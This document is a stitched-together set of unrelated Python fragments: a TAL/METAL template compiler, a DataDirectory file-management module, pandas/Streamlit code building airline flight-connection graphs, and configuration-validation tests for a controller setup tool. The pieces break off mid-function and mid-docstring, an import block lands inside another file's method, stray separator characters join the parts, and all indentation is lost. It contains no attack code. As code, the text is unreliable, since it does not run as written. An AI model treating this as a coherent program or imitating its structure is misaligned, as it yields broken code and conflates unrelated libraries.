# We should treat this an implicit omit-tag
foundTALAtts.append (TAL_OMITTAG)
# Will go to default, i.e. yes
foundCommandsArgs [TAL_OMITTAG] = ""
for att, value in attributes:
originalAttributes [att] = value
if (TALElementNameSpace and not att.find (':') > 0):
# This means that the attribute name does not have a namespace, so use the prefix for this tag.
commandAttName = prefixToAdd + att
else:
commandAttName = att
self.log.debug ("Command name is now %s" % commandAttName)
if (att[0:5] == "xmlns"):
# We have a namespace declaration.
prefix = att[6:]
if (value == METAL_NAME_URI):
# It's a METAL namespace declaration
if (len (prefix) > 0):
self.metal_namespace_prefix_stack.append (self.metal_namespace_prefix)
self.setMETALPrefix (prefix)
# We want this function called when the scope ends
popTagFuncList.append (self.popMETALNamespace)
else:
# We don't allow METAL/TAL to be declared as a default
msg = "Can not use METAL name space by default, a prefix must be provided."
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
elif (value == TAL_NAME_URI):
# TAL this time
if (len (prefix) > 0):
self.tal_namespace_prefix_stack.append (self.tal_namespace_prefix)
self.setTALPrefix (prefix)
# We want this function called when the scope ends
popTagFuncList.append (self.popTALNamespace)
else:
# We don't allow METAL/TAL to be declared as a default
msg = "Can not use TAL name space by default, a prefix must be provided."
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
else:
# It's nothing special, just an ordinary namespace declaration
cleanAttributes.append ((att, value))
elif (commandAttName in self.tal_attribute_map):
# It's a TAL attribute
cmnd = self.tal_attribute_map [commandAttName]
if (cmnd == TAL_OMITTAG and TALElementNameSpace):
self.log.warning ("Suppressing omit-tag command present on TAL or METAL element")
else:
foundCommandsArgs [cmnd] = value
foundTALAtts.append (cmnd)
elif (commandAttName in self.metal_attribute_map):
# It's a METAL attribute
cmnd = self.metal_attribute_map [commandAttName]
foundCommandsArgs [cmnd] = value
foundMETALAtts.append (cmnd)
else:
cleanAttributes.append ((att, value))
tagProperties ['popFunctionList'] = popTagFuncList
# This might be just content
if ((len (foundTALAtts) + len (foundMETALAtts)) == 0):
# Just content, add it to the various stacks
self.addTag ((tag, cleanAttributes), tagProperties)
return
# Create a symbol for the end of the tag - we don't know what the offset is yet
self.endTagSymbol += 1
tagProperties ['endTagSymbol'] = self.endTagSymbol
# Sort the METAL commands
foundMETALAtts.sort()
# Sort the tags by priority
foundTALAtts.sort()
# We handle the METAL before the TAL
allCommands = foundMETALAtts + foundTALAtts
firstTag = 1
for talAtt in allCommands:
# Parse and create a command for each
cmnd = self.commandHandler [talAtt](foundCommandsArgs[talAtt])
if (cmnd is not None):
if (firstTag):
# The first one needs to add the tag
firstTag = 0
tagProperties ['originalAtts'] = originalAttributes
tagProperties ['command'] = cmnd
self.addTag ((tag, cleanAttributes), tagProperties)
else:
# All others just append
self.addCommand(cmnd)
if (firstTag):
tagProperties ['originalAtts'] = originalAttributes
tagProperties ['command'] = (TAL_STARTTAG, (tag, singletonElement))
self.addTag ((tag, cleanAttributes), tagProperties)
else:
# Add the start tag command in as a child of the last TAL command
self.addCommand((TAL_STARTTAG, (tag,singletonElement)))
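The namespace detection above keys off the text before the first colon in the tag name; a minimal sketch of that test, assuming illustrative 'tal'/'metal' prefixes (real templates bind them with xmlns declarations):

```python
# Minimal sketch of the namespace test parseStartTag performs on a tag name.
# The 'tal'/'metal' default prefixes here are assumptions for illustration.
def element_prefix(tag, tal_prefix='tal', metal_prefix='metal'):
    """Return the prefix (with ':') to prepend to unprefixed attributes,
    or None when the tag is not in the TAL/METAL namespace."""
    colon = tag.find(':')
    if colon > 0 and tag[:colon] in (tal_prefix, metal_prefix):
        return tag[:colon] + ':'
    return None
```

For example, `element_prefix('tal:block')` returns `'tal:'`, so an attribute written simply as `content="..."` on that element is interpreted as `tal:content`.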
def parseEndTag (self, tag):
""" Just pop the tag and related commands off the stack. """
self.popTag ((tag,None))
def parseData (self, data):
# Just add it as an output
self.addCommand((TAL_OUTPUT, data))
def compileCmdDefine (self, argument):
# Compile a define command, resulting argument is:
# [(isLocalFlag (Y/n), variableName, variablePath),...]
# Break up the list of defines first
commandArgs = []
# We only want to match semi-colons that are not escaped
argumentSplitter = re.compile ('(?<!;);(?!;)')
for defineStmt in argumentSplitter.split (argument):
# remove any leading space and un-escape any semi-colons
defineStmt = defineStmt.lstrip().replace (';;', ';')
# Break each defineStmt into pieces "[local|global] varName expression"
stmtBits = defineStmt.split (' ')
isLocal = 1
if (len (stmtBits) < 2):
# Error, badly formed define command
msg = "Badly formed define command '%s'. Define commands must be of the form: '[local|global] varName expression[;[local|global] varName expression]'" % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# Assume to start with that >2 elements means a local|global flag
if (len (stmtBits) > 2):
if (stmtBits[0] == 'global'):
isLocal = 0
varName = stmtBits[1]
expression = ' '.join (stmtBits[2:])
elif (stmtBits[0] == 'local'):
varName = stmtBits[1]
expression = ' '.join (stmtBits[2:])
else:
# Must be a space in the expression that produced the extra elements
varName = stmtBits[0]
expression = ' '.join (stmtBits[1:])
else:
# Only two bits
varName = stmtBits[0]
expression = ' '.join (stmtBits[1:])
commandArgs.append ((isLocal, varName, expression))
return (TAL_DEFINE, commandArgs)
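The splitting regex above matches only semicolons that are not doubled, so `;;` survives as an escape for a literal `;`. A short sketch of that behavior:

```python
import re

# Sketch of the statement splitting used by compileCmdDefine above: a lone
# ';' separates define statements, while ';;' is an escaped literal ';'.
splitter = re.compile(r'(?<!;);(?!;)')
raw = "x path/one;; two; global y path/three"
stmts = [s.lstrip().replace(';;', ';') for s in splitter.split(raw)]
assert stmts == ['x path/one; two', 'global y path/three']
```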
def compileCmdCondition (self, argument):
# Compile a condition command, resulting argument is:
# path, endTagSymbol
# Sanity check
if (len (argument) == 0):
# No argument passed
msg = "No argument passed! condition commands must be of the form: 'path'"
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
return (TAL_CONDITION, (argument, self.endTagSymbol))
def compileCmdRepeat (self, argument):
# Compile a repeat command, resulting argument is:
# (varname, expression, endTagSymbol)
attProps = argument.split (' ')
import glob
import os
from pathlib import Path
import yaml
from typing import Any, Dict, List, Union
import warnings
from .data_interface import MagicDataInterface
from .self_aware_data import SelfAwareData, SelfAwareDataInterface
DIRS_TO_IGNORE = ['__pycache__']
class DataDirectoryManager:
config_file_name = '.data_map.yaml'
@classmethod
def register_project(cls, project_hint: str, project_path: str) -> None:
"""
Register project and its data path to the config.
If no config exists, create one.
Args:
project_hint: Name for project
project_path: Path to project's data directory
Raises: ValueError if project_hint already exists in file
"""
# check that project_path is a valid path
expanded_project_path = Path(project_path).expanduser()
if not expanded_project_path.exists():
raise FileNotFoundError("Not a valid path: '{}'".format(project_path))
config_file_path = Path(Path.home(), cls.config_file_name)
if not config_file_path.exists():
cls._init_config()
config = cls._load_config()
hint_already_in_file = cls._check_for_entry_in_config(project_hint, config)
if hint_already_in_file:
raise ValueError("Project hint '{}' is already registered".format(project_hint))
cls._register_project_to_file(project_hint, expanded_project_path, config_file_path)
@classmethod
def load_project_path_from_hint(cls, hint):
"""
Determine the data_path from the hint.
Look for a data_map config, and look for hint within the config.
Otherwise, the hint may be a legitimate path, in which case use it.
If neither of the above work, raise an error.
Args:
hint: project hint previously registered, or a real path.
Returns: path registered for the hint
"""
if cls._config_exists():
config = cls._load_config()
if config is not None and hint in config:
expanded_config_path = Path(config[hint]['path']).expanduser().resolve()
if expanded_config_path.exists():
return expanded_config_path
else:
raise ValueError("Path provided in config for '{}' does not exist: {}".format(hint,
expanded_config_path))
expanded_path = Path(hint).expanduser().resolve()
if expanded_path.exists():
return expanded_path
raise ValueError("Provided hint '{}' is not registered and is not a valid path. "
"\n\nRegister your project with `DataManager.register_project(project_hint, project_path)`"
"".format(hint))
@classmethod
def list_projects(cls) -> None:
"""List the projects known to `DataManager`."""
config = cls._load_config()
if len(config) == 0:
print("No projects registered!")
for project_hint in config:
print("{}: {}".format(project_hint, config[project_hint]['path']))
@classmethod
def _init_config(cls):
"""Create an empty config file."""
config_path = Path(Path.home(), cls.config_file_name)
print("Creating config at {}".format(config_path))
config_path.touch(exist_ok=False)
@classmethod
def _config_exists(cls) -> bool:
"""Determine whether a config file exists"""
config_path = Path(Path.home(), cls.config_file_name)
return config_path.exists()
@classmethod
def _load_config(cls) -> Dict:
"""Load the config file. If config file is empty, return an empty dict."""
config_path = Path(Path.home(), cls.config_file_name)
if cls._config_exists():
with open(str(config_path)) as config_file:
    config = yaml.safe_load(config_file)
if config is None:
config = {}
return config
else:
raise FileNotFoundError('Config file not found at: {}'.format(config_path))
@staticmethod
def _check_for_entry_in_config(project_hint: str, config: Dict) -> bool:
"""
Returns whether project_hint already exists in config file.
Args:
project_hint: Name for the project.
config: The config dict.
Returns: Bool for whether the project_hint is registered in the config.
"""
return config is not None and project_hint in config
@classmethod
def _get_path_for_project_hint(cls, project_hint: str, config: Dict) -> Path:
if cls._check_for_entry_in_config(project_hint, config):
return Path(config[project_hint]['path'])
else:
raise ValueError("Project hint '{}' is not registered".format(project_hint))
@staticmethod
def _register_project_to_file(project_hint: str, project_path: Path, config_file_path: Path):
"""
Appends project details to specified config file.
Args:
project_hint: The name for the project.
project_path: Path to project data directory.
config_file_path: Path to config file.
Returns: None.
"""
config_entry_data = {
project_hint: {
'path': project_path.__str__(),
}
}
with open(config_file_path.__str__(), 'a') as f:
yaml.dump(config_entry_data, f, default_flow_style=False)
class TestingDataDirectoryManager(DataDirectoryManager):
"""DataDirectoryManager useful for testing purposes, as it does not interact with the file system."""
@classmethod
def _config_exists(cls):
return True
@classmethod
def _load_config(cls) -> Dict:
return {'test': '.'}
@staticmethod
def _register_project_to_file(project_hint: str, project_path: Path, config_file_path: Path):
return
class DataDirectory:
"""Manages saving, loading, and viewing data files within a specific data path."""
data_dir_manager = DataDirectoryManager
def __init__(self, path: str, contents: Dict[str, 'DataDirectory'] = None,
magic_data_interface=MagicDataInterface):
"""
Initialize a DataDirectory at a path. The contents of that DataDirectory are recursively characterized and the
DataDirectory's data_type set. For testing purposes, the contents can also be set directly.
Args:
path: A file path at which to instantiate the DataDirectory.
contents: The files and subdirectories contained in the directory.
magic_data_interface: MagicDataInterface object to use to interface with files.
"""
self.path = Path(path).expanduser().resolve()
if not self.path.exists():
warnings.warn('DataDirectory path does not exist: {}'.format(self.path), RuntimeWarning)
self.name = os.path.basename(self.path)
if contents is None:
self.contents = self._characterize_dir(self.path)
else:
self.contents = contents
# determine_data_type has to be done _after_ characterize dir because it inspects the children
self.data_type = self._determine_data_type()
self.magic_data_interface = magic_data_interface
@classmethod
def register_project(cls, project_hint: str, project_path: str) -> None:
"""Register a hint for a project data directory so that it can be easily reloaded via `load(hint)`."""
return cls.data_dir_manager.register_project(project_hint, project_path)
@classmethod
def list_projects(cls) -> None:
"""List all data directories previously registered via `register_project`."""
return cls.data_dir_manager.list_projects()
@classmethod
def load_project(cls, hint):
"""Create a DataDirectory from a project hint previously registered via `register_project`."""
path = cls.data_dir_manager.load_project_path_from_hint(hint)
return cls(path)
@classmethod
def load(cls, hint):
"""Shortcut for `load_project`."""
return cls.load_project(hint)
def __getitem__(self, key):
return self.contents[key]
def reload(self):
self.contents = self._characterize_dir(self.path)
def is_file(self):
return False
def _determine_data_type(self) -> str:
dir_data_types = [self.contents[f].data_type for f in self.contents]
unique_dir_data_types = list(set(dir_data_types))
if len(unique_dir_data_types) == 0:
return 'empty'
elif len(unique_dir_data_types) > 1:
return 'mixed'
else:
return unique_dir_data_types[0]
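The type rollup above can be stated compactly; a minimal sketch (function name is illustrative) of how a directory's data_type is derived from its children:

```python
# Sketch of the data_type rollup performed by _determine_data_type: no
# children -> 'empty', more than one distinct child type -> 'mixed',
# otherwise the single shared type.
def rollup_data_type(child_types):
    unique = set(child_types)
    if not unique:
        return 'empty'
    if len(unique) > 1:
        return 'mixed'
    return unique.pop()
```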
def select(self, hint: str) -> Union['DataDirectory', 'DataFile']:
"""Return the DataDirectory from self.contents that matches the hint.
If more than one file matches the hint, select the file whose data_type matches the hint exactly.
Otherwise, raise an error listing all matches.
Args:
hint: string to use to search for a file within the directory.
Raises:
FileNotFoundError: if no file can be found in the data directory that matches the hint.
ValueError: if more than one file is found in the data directory that matches the hint.
"""
matches = [self.contents[d] for d in self.contents if hint in self.contents[d].name]
if len(matches) == 1:
return matches[0]
elif len(matches) == 0:
raise FileNotFoundError("No match for hint '{}'".format(hint))
elif len(matches) > 1:
exact_matches = [self.contents[d] for d in self.contents if hint == self.contents[d].data_type]
if len(exact_matches) == 1:
return exact_matches[0]
elif len(exact_matches) == 0:
match_names = [m.name for m in matches]
raise ValueError("More than one match found: [{}]".format(', '.join(match_names)))
elif len(exact_matches) > 1:
match_names = [m.name for m in exact_matches]
raise ValueError("More than one match found: [{}]".format(', '.join(match_names)))
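The two-pass matching above (substring match on name, then exact data_type match to break ties) can be sketched over plain dicts; names and entries here are illustrative:

```python
# Illustrative two-pass matching like select() above, over plain dicts:
# substring match on name first, then exact data_type match to break ties.
def select_entry(contents, hint):
    matches = [c for c in contents.values() if hint in c['name']]
    if len(matches) == 1:
        return matches[0]
    if not matches:
        raise FileNotFoundError("No match for hint '{}'".format(hint))
    exact = [c for c in contents.values() if hint == c['data_type']]
    if len(exact) == 1:
        return exact[0]
    raise ValueError("More than one match found")

entries = {
    'model_a.csv': {'name': 'model_a.csv', 'data_type': 'csv'},
    'model_a.csv.gz': {'name': 'model_a.csv.gz', 'data_type': 'gz'},
}
# 'csv' substring-matches both names; the exact data_type match wins.
assert select_entry(entries, 'csv')['name'] == 'model_a.csv'
```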
def latest(self) -> Union['DataDirectory', 'DataFile']:
"""Return the latest data file or directory, as determined alphabetically."""
if len(self.contents) == 0:
return None
sorted_contents = sorted([d for d in self.contents])
latest_content = sorted_contents[-1]
return self.contents[latest_content]
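Note that `latest()` relies on lexicographic order, which matches chronological order only for zero-padded, ISO-style names; a short sketch of the caveat (file names illustrative):

```python
# latest() picks the lexicographically greatest name, which matches
# chronological order only for zero-padded, ISO-style names.
iso_named = ['2021-01-02_run', '2021-01-10_run', '2020-12-31_run']
assert sorted(iso_named)[-1] == '2021-01-10_run'

# Unpadded counters break this assumption:
runs = ['run_2', 'run_10']
assert sorted(runs)[-1] == 'run_2'   # 'run_2' > 'run_10' lexicographically
```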
def save(self, data: Any, file_name: str, **kwargs) -> None:
"""
Save a data object within the data directory.
Args:
data: data object to save.
file_name: file name for the saved object, including file extension. The file extension is used to determine
the file type and method for saving the data.
**kwargs: Remaining args are passed to the data interface save function.
"""
if isinstance(data, SelfAwareData):
new_data_dir = self._save_self_aware_data(data, file_name, **kwargs)
else:
new_data_dir = self._save_file(data, file_name, **kwargs)
self.contents[new_data_dir.name] = new_data_dir
def _save_file(self, data: Any, file_name: str, **kwargs) -> 'DataFile':
saved_file_path = self.magic_data_interface.save(data, str(Path(self.path, file_name)), **kwargs)
return DataFile(saved_file_path)
def _save_self_aware_data(self, data: Any, file_name: str, **kwargs) -> 'SelfAwareDataDirectory':
new_transform_dir_path = SelfAwareDataInterface.save(data, parent_path=self.path, file_name=file_name, **kwargs)
return SelfAwareDataDirectory(new_transform_dir_path)
def mkdir(self, dir_name: str):
"""
Create a new directory within the current directory.
Args:
dir_name: Name for the new directory
Returns: None
"""
dir_path = Path(self.path, dir_name)
os.makedirs(dir_path)
self.contents[dir_name] = DataDirectory(dir_path)
@staticmethod
def _characterize_dir(path) -> Dict[str, 'DataDirectory']:
"""
Characterize the contents of the DataDirectory, creating new DataDirectories for subdirectories and DataFiles
for files.
Args:
path: File path to characterize.
Returns: A Dictionary of file/directory names (str) to DataDirectory/DataFile objects.
"""
contents = {}
glob_path = Path(path, '*')
subpaths = glob.glob(glob_path.__str__())
for p in subpaths:
name = os.path.basename(p)
if name in DIRS_TO_IGNORE:
continue
if os.path.isdir(p):
if 'sad_dir' in p or 'transformed_data_dir' in p:
data_directory = SelfAwareDataDirectory(p)
else:
data_directory = DataDirectory(p)
contents[data_directory.name] = data_directory
elif os.path.isfile(p):
contents[name] = DataFile(p)
else:
warnings.warn('{} is neither a file nor a directory.'.format(p), RuntimeWarning)
return contents
def ls(self, full=False) -> None:
"""
Print the contents of the data directory. Defaults to printing all subdirectories, but not all files.
Args:
full: Whether to print all files.
"""
contents_ls_tree = self._build_ls_tree(full=full)
self._print_ls_tree(contents_ls_tree)
def _build_ls_tree(self, full: bool = False, top_dir: bool = True) -> Dict[str, List]:
"""
Recursively navigate the data directory tree and build a | |
False:
dfs[which_ix] = df2
if is_print and df2_isempty == False:
st.write(df2)
#display(df2)
printed_header = True
return dfs
#---------------------------------------------------------
def handleCityGraph(keep_early_arr, city, choice_ix, id_list, fsu, bookings_f, feeders, is_print=True, delay=45):
# Need to increase efficiency
#st.write("????????????????")
#st.write("Enter handleCityGraph")
#st.write("fsu.SCH_DEP_DTMZ", fsu.SCH_DEP_DTMZ)
# I need to return two structures: nodes and edges.
# This pair of structures should be returned for each flight I am working with.
# Nodes are single IDs with arr and dep times, arr and dep delays.
# Edges are double IDs with PAX, rotation, and connection times.
#st.write("Enter handleCityGraph")
# Find all inbound flights from a given city (other than PTY)
city_inbounds = findCity(bookings_f, city)
if choice_ix == 'all':
min_ix = 0
max_ix = city_inbounds.shape[0]
else:
min_ix = choice_ix
max_ix = choice_ix+1
# For each inbound flight, compute the corresponding outbound flights
dfs = {}
for which_ix in range(min_ix, max_ix):
nodes = []
try:
inbound = city_inbounds.iloc[which_ix].id_f
nodes.append(inbound)
# keep: id_f only ==> a node
fsu_inbound = fsu.set_index('id').loc[inbound]
except (KeyError, IndexError):
continue
inbound_arr_delay = fsu_inbound.ARR_DELAY_MINUTES
# if the arrival delay of the inbound is negative, the plane arrived early, and the
# passengers have time to connect
if keep_early_arr == False and inbound_arr_delay < 0:
continue
# just a collection of 'id_nf' ==> nodes
outbounds = findOutboundIds(id_list, inbound).to_frame()
outbounds['id_f'] = inbound
nodes.extend(outbounds['id_nf'].tolist()) # This is the list of nodes
edges = outbounds['id_nf'].to_frame('e2') # e2 is id_nf
edges['e1'] = inbound # e1 is id_f
edges['id'] = edges['e1'] + '_' + edges['e2']
# What is left to do is add the metadata to these lists
# Nodes: the data comes from FSU files
# Edges: the data comes from PAX files
# Create a unique id that combines inbound (feeder) and outbound flights
# This will allow me to merge two files with feeder/non-feeder columns
feeders_1 = feeders[feeders['id_f'] == inbound].copy()  # copy to avoid SettingWithCopyWarning below
feeders_1['id_f_nf'] = feeders_1['id_f'] + '_' + feeders_1['id_nf']
# extract these outgoings from the FSU database
# if outbounds has ids not in fsu, this approach will not work
fsu_outbound = pd.merge(fsu, outbounds, how='inner', left_on='id', right_on='id_nf')
fsu_outbound['id_f_nf'] = fsu_outbound['id_f'] + '_' + fsu_outbound['id_nf']
fsu_pax = pd.merge(fsu_outbound, feeders_1, how='inner', left_on='id_f_nf', right_on='id_f_nf')
#fsu_outbound.to_csv("outbound_cityGraph.csv", index=0)
fsu_pax.drop_duplicates(inplace=True)
# Compute connection time (inbound.IN - outbound.sch_dep)
id_f = fsu_pax.id_f_x
id_nf = fsu_pax.id_nf_x
# Node metadata
dep_delay = (fsu_pax.OUT_DTMZ - fsu_pax.SCH_DEP_DTMZ) / 1e9 / 60
arr_delay = (fsu_pax.IN_DTMZ - fsu_pax.SCH_ARR_DTMZ) / 1e9 / 60 # outbound
od = fsu_pax.OD
node_nf_dict = {'id':id_nf, 'arr_delay':arr_delay, 'dep_delay':dep_delay, 'od':od}
d_nf = pd.DataFrame(node_nf_dict)
# Add feeder row
# Find inbound in FSU data
# fsu_inbound is a Series. Another way to access : fsu_inbound.loc['SCH_DEP_DTMZ',0]
dep_delay = (fsu_inbound.OUT_DTMZ - fsu_inbound.transpose().SCH_DEP_DTMZ) / 1e9 / 60
arr_delay = (fsu_inbound.IN_DTMZ - fsu_inbound.transpose().SCH_ARR_DTMZ) / 1e9 / 60 # outbound
od = fsu_inbound.OD
row_f = {'id':inbound, 'arr_delay':arr_delay, 'dep_delay':dep_delay, 'od':od}
d_nf.loc[-1] = row_f
# drop=True: do not keep the new index column created by default
node_df = d_nf.sort_index().reset_index(drop=True)
# The first node is the feeder
# All the other nodes are the outbounds
# Create Graph edges and metadata
id_f_nf = id_f + "_" + id_nf
#st.write("handleGraph, fsu_inbound= ", fsu_inbound)
#st.write("IN_DTMZ: ", fsu_inbound.IN_DTMZ)
#st.write("SCH_DEP_DTMZ: ", fsu_outbound.SCH_DEP_DTMZ)
# Not clear why transpose is no longer needed.
available = (fsu_outbound.SCH_DEP_DTMZ - fsu_inbound.IN_DTMZ) / 1e9 / 60
planned = (fsu_outbound.SCH_DEP_DTMZ - fsu_inbound.SCH_ARR_DTMZ) / 1e9 / 60
#st.write("available= ", available)
#available = (fsu_outbound.SCH_DEP_DTMZ - fsu_inbound.transpose().IN_DTMZ) / 1e9 / 60
#planned = (fsu_outbound.SCH_DEP_DTMZ - fsu_inbound.transpose().SCH_ARR_DTMZ) / 1e9 / 60
pax_id_nf = fsu_pax.id_nf_y
pax_id_f = fsu_pax.id_f_y
pax_avail = (fsu_pax.SCH_DEP_DTMZ - fsu_inbound.transpose().IN_DTMZ) / 1e9 / 60
pax_planned = (fsu_pax.SCH_DEP_DTMZ - fsu_inbound.transpose().SCH_ARR_DTMZ) / 1e9 / 60
dfx = pd.DataFrame([pax_id_f, pax_id_nf, pax_avail, pax_planned]).transpose()
#fsux = fsu[fsu['id'] == '2019/10/01SJOPTY10:29459']  # leftover debug lookups, unused
#fsuy = fsu[fsu['id'] == '2019/10/01PTYTPA14:12393']
delta = planned - available # = IN - SCH_ARR
edge_nf_zip = zip(available, planned, delta)
id_f = fsu_pax['id_f_y']
id_nf = fsu_pax['id_nf_y']
id_f_nf = fsu_pax['id_f_nf']
#st.write("No ID, fsu_pax: ", fsu_pax.shape)
edge_df = pd.DataFrame()
edge_df = pd.concat([edge_df, id_f_nf, id_f, id_nf], axis=1)
#st.write("No ID, edge_df: ", edge_df.shape)
## Reorder the columns for clarity
edge_df['avail'] = available
edge_df['planned'] = planned
edge_df['delta'] = delta
edge_df['pax'] = fsu_pax.pax_nf
## EDGE correct. Now add metadata: avail, planned, delta
# Remove edges and nodes for flights with less available connection time than `delay`
# (I could either simplify the graph, or use brushing in the graph. Or both.)
# Let us do both. Simplification in this method, and brushing in Altair.
#st.write(node_df.columns)
#st.write(edge_df.columns)
# 1. find all nodes to remove
# The passengers that "could" miss their flights have less available time than needed.
# We keep the flights that potentially have the most impact on the network
ids_nf_to_keep = edge_df[edge_df['avail'] < delay]['id_nf_y']
#st.write("No ID, edge_df after filtering delays: ", edge_df.shape)
#st.write("ID, ids_nf_to_keep: ", ids_nf_to_keep)
#st.write("node_df: ", node_df)
#st.write("edge_df= ", edge_df)
#st.write("delay= ", delay)
#st.write("handleCitiesGraph, ids_nf_to_keep: ", ids_nf_to_keep) # # EMPTY. WHY?
#st.write("ids_nf_to_keep: ", ids_nf_to_keep)
# 2. delete nodes from node DataFrame
node_df = node_df.set_index('id').loc[ids_nf_to_keep,:].reset_index()
# Add back the first row that is the feeder (it stays)
#st.write("NoID, row_f= ", row_f)
node_df.loc[-1] = row_f
node_df = node_df.sort_index().reset_index(drop=True)
# 3. delete edges from edge DataFrame
edge_df = edge_df.set_index('id_nf_y').loc[ids_nf_to_keep,:].reset_index()
#st.write("NoID, node_df: ", node_df)
#st.write("NoID, edge_df: ", edge_df)
#st.write(node_df.shape, edge_df.shape)
# Only the first ix
return node_df, edge_df
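The delay arithmetic above divides differences of epoch-nanosecond timestamps by 1e9 (ns to s) and 60 (s to min). A plain-integer sketch with illustrative values:

```python
# The *_DTMZ columns above hold epoch timestamps in nanoseconds, so delays
# in minutes come from (actual - scheduled) / 1e9 / 60. Values illustrative.
NS_PER_MIN = 60 * 1_000_000_000

sch_dep = 1_569_900_000_000_000_000      # scheduled departure, epoch ns
out_dtmz = sch_dep + 45 * NS_PER_MIN     # pushed back 45 minutes late

dep_delay_minutes = (out_dtmz - sch_dep) / 1e9 / 60
assert dep_delay_minutes == 45.0
```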
#---------------------------------------------------------
def handleCityGraphId(flight_id, keep_early_arr, only_keep_late_dep, id_list, fsu, bookings_f, feeders, is_print=True, delay=45, flight_id_level=0, debug=False):
"""
Given an inbound flight to PTY, return the corresponding outbound flights.
Returns a tuple of DataFrames with the nodes and edges.
Arguments
flight_id_level: level of flight_id in the graph network. The root has level zero; children of flight_id have level 1 and grandchildren level 2. Each leg of a flight increases the level by 1.
"""
#st.write("enter handleCityGraphId")
# I need to return two structures: nodes and edges.
# This pair of structures should be returned for each flight I am working with.
# Nodes are single IDs with arr and dep times, arr and dep delays.
# Edges are double IDs with PAX, rotation, and connection times.
#st.write("Enter handleCityGraph")
inbound = flight_id
node_df = pd.DataFrame()
edge_df = pd.DataFrame()
#city_inbounds = findCity(bookings_f, city)
"""
if choice_ix == 'all':
min_ix = 0
max_ix = city_inbounds.shape[0]
else:
min_ix = choice_ix
max_ix = choice_ix+1
"""
min_ix, max_ix = 0, 1 # single element in the loop, so single flight_id
# For each inbound flight, compute the corresponding outbound flights
for which_ix in range(min_ix, max_ix):
nodes = []
inbound = pd.DataFrame({'id':[inbound]}) # New, created from method argument
try:
nodes.append(inbound)
fsu_inbound = fsu[fsu['id'] == inbound['id'].values[0]]
except IndexError:
#st.write("except")
continue
inbound_arr_delay = fsu_inbound.ARR_DELAY_MINUTES.values[0]
# if the arrival delay of the inbound is negative, the plane arrived early, and the
# passengers have time to connect
#st.write("inbound_arr_delay= ", inbound_arr_delay) # DF
# Do not keep early arrivals
# If the inbound (into PTY) is early, ignore subsequent flights
if keep_early_arr == False and inbound_arr_delay < 0:
#st.write("continue")
## Must keep keep_early_arrivals to TRUE for now. 2021-06-07.
continue
# just a collection of 'id_nf' ==> nodes
inbound = inbound['id'].values[0] # Series convert to list using .values
outbounds = findOutboundIds(id_list, inbound).to_frame()
outbounds['id_f'] = inbound
nodes.extend(outbounds['id_nf'].tolist()) # This is the list of nodes
edges = outbounds['id_nf'].to_frame('e2') # e2 is id_nf
edges['e1'] = inbound # e1 is id_f
edges['id'] = edges['e1'] + '_' + edges['e2']
# What is left to do is add the metadata to these lists
# Nodes: the data comes from FSU files
# Edges: the data comes from PAX files
# Create a unique id that combines inbound (feeder) and outbound flights
# This will allow me to merge two files with feeder/non-feeder columns
feeders_1 | |
"""
Copyright (c) 2014-2019 Wind River Systems, Inc.
SPDX-License-Identifier: Apache-2.0
"""
from six.moves import configparser
import mock
import os
import pytest
import sys
import controllerconfig.common.exceptions as exceptions
from controllerconfig import validate
from controllerconfig import DEFAULT_CONFIG
sys.modules['fm_core'] = mock.Mock()
import controllerconfig.systemconfig as cr # noqa: E402
def _dump_config(config):
""" Prints contents of config object """
for section in config.sections():
print("[%s]" % section)
for (name, value) in config.items(section):
print("%s=%s" % (name, value))
def _test_system_config(filename):
""" Test import and generation of answerfile """
# Parse the system_config file
system_config = cr.parse_system_config(filename)
# Dump results for debugging
print("Parsed system_config:\n")
_dump_config(system_config)
# Validate the system config file
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
# Validate the system config file.
# Using onboard validation since the validator's reference version number
# is only set at build-time when validating offboard
validate(system_config, DEFAULT_CONFIG, None, False)
def test_system_config_simple():
""" Test import of simple system_config file """
# Create the path to the system_config file
systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.simple")
_test_system_config(systemfile)
def test_system_config_ipv6():
""" Test import of system_config file with ipv6 oam """
# Create the path to the system_config file
systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.ipv6")
_test_system_config(systemfile)
def test_system_config_lag_vlan():
""" Test import of system_config file with lag and vlan """
# Create the path to the system_config file
systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.lag.vlan")
_test_system_config(systemfile)
def test_system_config_security():
""" Test import of system_config file with security config """
# Create the path to the system_config file
systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.security")
_test_system_config(systemfile)
def test_system_config_ceph():
""" Test import of system_config file with ceph config """
# Create the path to the system_config file
systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.ceph")
_test_system_config(systemfile)
def test_system_config_simplex():
""" Test import of system_config file for AIO-simplex """
# Create the path to the system_config file
systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/", "system_config.simplex")
_test_system_config(systemfile)
def test_system_config_simplex_mgmt():
""" Test import of system_config file for AIO-simplex with management
configuration"""
# Create the path to the system_config file
systemfile = os.path.join(
os.getcwd(), "controllerconfig/tests/files/",
"system_config.simplex_mgmt")
_test_system_config(systemfile)
# Test MGMT_NETWORK parameters that are not allowed
system_config = cr.parse_system_config(systemfile)
system_config.set('MGMT_NETWORK', 'GATEWAY', '192.168.42.1')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
system_config = cr.parse_system_config(systemfile)
system_config.set('MGMT_NETWORK', 'LOGICAL_INTERFACE',
'LOGICAL_INTERFACE_1')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test overlap with OAM network
system_config = cr.parse_system_config(systemfile)
system_config.set('MGMT_NETWORK', 'CIDR', '10.10.10.0/24')
with pytest.raises(exceptions.ConfigFail):
cr.create_cgcs_config_file(None, system_config, None, None, None, 0,
validate_only=True)
with pytest.raises(exceptions.ConfigFail):
validate(system_config, DEFAULT_CONFIG, None, False)
# Test IPv6 management CIDR (not supported)
